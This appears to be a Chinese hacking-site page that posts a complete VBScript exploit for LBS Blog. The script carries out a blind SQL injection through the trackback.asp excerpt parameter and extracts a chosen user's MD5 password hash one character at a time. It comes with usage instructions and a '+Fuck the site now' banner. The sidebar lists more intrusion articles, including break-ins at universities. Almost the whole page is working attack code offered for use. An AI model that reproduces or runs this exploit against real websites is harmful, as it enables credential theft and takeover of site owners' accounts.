[推荐]LBS blog又一注射漏洞含漏洞解析和exp'============================================================================
'使用说明:
' 在命令提示符下:
' cscript.exe lbsblog.vbs 要攻击的网站的博客路径 要破解的博客用户密码
'如:
' cscript.exe lbsblog.vbs www.xxxx.com/bbs/boke.asp admin
' by loveshell
'============================================================================
On Error Resume Next
Dim oArgs
Dim olbsXML 'XMLHTTP对象用来打开目标网址
Dim TargetURL '目标网址
Dim userid '博客用户名
Dim TempStr '存放已获取的部分 MD5密码
Dim CharHex '定义16进制字符
Dim charset
Set oArgs = WScript.arguments
If oArgs.count <> 2 Then Call ShowUsage()
Set olbsXML = createObject("Microsoft.XMLHTTP")
'补充完整目标网址
TargetURL = oArgs(0)
If LCase(Left(TargetURL,7)) <> "http://" Then TargetURL = "http://" & TargetURL
If right(TargetURL,1) <> "/" Then TargetURL = TargetURL & "/"
TargetURL=TargetURL & "trackback.asp"
userid=oArgs(1)
TempStr=""
CharHex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
WScript.echo "LBS Blog All version Exploit[新的注射漏洞]"&vbcrlf
WScript.echo "By 剑心"&vbcrlf
WScript.echo "http://www.loveshell.net/ ~_~我真的够无聊的......"&vbcrlf&vbcrlf
WScript.echo "+Fuck the site now"&vbcrlf
Call main(TargetURL,BlogName)
Set oBokeXML = Nothing
'----------------------------------------------sub-------------------------------------------------------
'============================================
'函数名称:main
'函数功能:主程序,注入获得blog 用户密码
'============================================
Sub main(TargetURL,BlogName)
Dim MainOffset,SubOffset,TempLen,OpenURL,GetPage
For MainOffset = 1 To 40
For SubOffset = 0 To 15
TempLen = 0
postdata = ""
postdata = "' or (select left(user_password,"&MainOffset&") from blog_user where user_id=" & userid & ")='" & TempStr&CharHex(SubOffset) &"' and '1'='1"
OpenURL = TargetURL
olbsXML.open "Post",OpenURL, False, "", ""
olbsXML.setRequestHeader "Content-Type","application/x-www-form-urlencoded"
olbsXML.send "url=http://www.loveshell.net/blog/&id=1&blog_name=loveshell_is_my_hero&excerpt=fuck" & escape(postdata)
GetPage = BytesToBstr(olbsXML.ResponseBody)
'判断访问的页面是否存在
'WScript.echo GetPage
If InStr(GetPage,"Trackback is already saved")<>0 Then
TempStr=TempStr & CharHex(SubOffset)
WScript.Echo "+Crack now:"&TempStr &String(40-MainOffset, "?")
Exit For
ElseIf InStr(GetPage,"Trackback Disabled")<>0 Then
WScript.echo vbcrlf & "Something error,Not vul" & vbcrlf
WScript.Quit
End If
next
Next
WScript.Echo vbcrlf& "+We Got It:" & TempStr & vbcrlf &vbcrlf&":P Don't Be evil"
End sub
'============================================
'函数名称:BytesToBstr
'函数功能:将XMLHTTP对象中的内容转化为GB2312编码
'============================================
Function BytesToBstr(body)
dim objstream
set objstream = createObject("ADODB.Stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
'============================
'函数名称:ShowUsage
'函数功能:使用方法提示
'============================
Sub ShowUsage()
WScript.echo " LBS blog Exploit" & vbcrlf & " By Loveshell/剑心"
WScript.echo "Usage:"& vbcrlf & " CScript " & WScript.ScriptFullName &" TargetURL userid"
WScript.echo "Example:"& vbcrlf & " CScript " & WScript.ScriptFullName &" http://www.loveshell.net/ 1"
WScript.echo ""
WScript.Quit
End Sub
| LBS blog又一注射漏洞含漏洞解析 | 07-04 | |
| BBSxp 2007 注射漏洞 | 07-02 | |
| 淘宝taobao 跨站 XSS 漏洞 | 06-29 | |
| LBS blog sql注射漏洞(统杀所有版 | 06-29 | |
| 最新QQ 163 126 等邮箱跨站挂马代 | 06-18 | |
| 入侵清华大学全过程 | 06-14 | |
| 入侵复旦大学 | 06-14 | |
| Ajax时代 SQL注入依然存在 | 06-13 | |
| PJblog跨站漏洞利用及修补 | 06-11 | |
| 从注入到拿WEBSHELL(BBSXP7 mssq | 06-11 | |
| 对国内主流邮箱的跨站测试 | 06-09 | |
| PhpWind 防盗链插件Showpic.php本 | 05-11 | |
您现在的位置: